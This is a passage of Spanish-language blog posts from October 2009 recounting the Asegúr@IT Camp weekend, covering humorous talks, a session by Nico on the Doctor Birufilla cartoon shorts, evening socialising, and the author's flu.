Éste episodio me encantó, con sus “homenajes” a Blade Runner, los Gremlyms, el mundo del hip hop y demás, es tronchante. Hubo ciertos problemas de audio que me sacaron de quicio porque no me permitían apreciar todos los chistes, pero aproveché después para buscarlos todos por Internet.

Y la última charla fue a cargo de Ricardo Varela, el “chico maravillas”, como Francisco Camping y mía, como el señor Cinturón, para buscar nuevas formas de posicionar nuestro negocio:

- “Tengo un negocio de la polla”
- “Ah, muy bien, ¿y cuál es el negocio?”
- “¿Pues no se lo he dicho? La polla.

De ahí a la cena, la sobremesa, las copas, el combate del furgolín en la disco del camping, la resaca, el desayuno, las fotos de despedida, el siempre nos querremos y el … “Nos vemos el año que viene que abren el Spá en el camping”.

Un buen fin de semana del que me llevo grandes momentos y una gripe de caballo que me ha dejado baldado y con las amígdalas inflamadas metido en la camita.

Saludos Malignos!

PD: Os pondremos el vídeo de las sesiones y las diapositivas y algunas fotos para que tengáis toda la info que parecéis de DEC Deluxe o Viceversa ;)

Asegúr@IT Camp: Doctor Birufilla

noreply@blogger.com (Maligno) — Sun, 25 Oct 2009 07:02:00 +0000

He de reconocer que traer a Nico al Asegúr@IT Camp ha sido de fan fatal. Quería ver la charla y como no encontraba momento ni lugar, decidí que lo mejor sería organizármela yo.

Aquí en la cabaña desde donde estoy escribiendo este post, tengo a Nico durmiendo en la otra habitación y mi lista de comics esperando a ser firmados, junto con mis DVD orginales de la primera y la segunda temporada y los muñeros de los clones. ¿Soy o no soy un fan fatal?

En la charla he descubierto los cortos del Doctor Birufilla que, durante un año, a razón de uno por semana te enseñaban algo bajo el título de "¿Sabías lo qué?" en El País de las Tentaciones EP3.. Nico nos ha hecho una selección para la charla, pero he de reconocer, que mi preferido es el del que los cocodrilos lloran después de comer.

¿Tienes 40 minutos que llenar con unas risas? Hazte la cadena youtubiana, vete al primero y disfruta los 43. Nota: Hay uno repetido (luego falta el número 29) y otro que está a medias, pero sigue siendo divertidisimo encontrarte a Mister T, Epi y Blas, C3PO, R2D2, Tony Blair, o George Bush entre estas píldoras de Humor.

Saludos Malignos!

Asegúr@IT Camp

noreply@blogger.com (Maligno) — Sat, 24 Oct 2009 22:19:00 +0000

Todo debuti. Acabaron las charlas. Gripe, un gramo de medicamentos y a la cama. Resaca.

Saludos Malignos!

PD: Sí, ya veo porque la gente usa twitter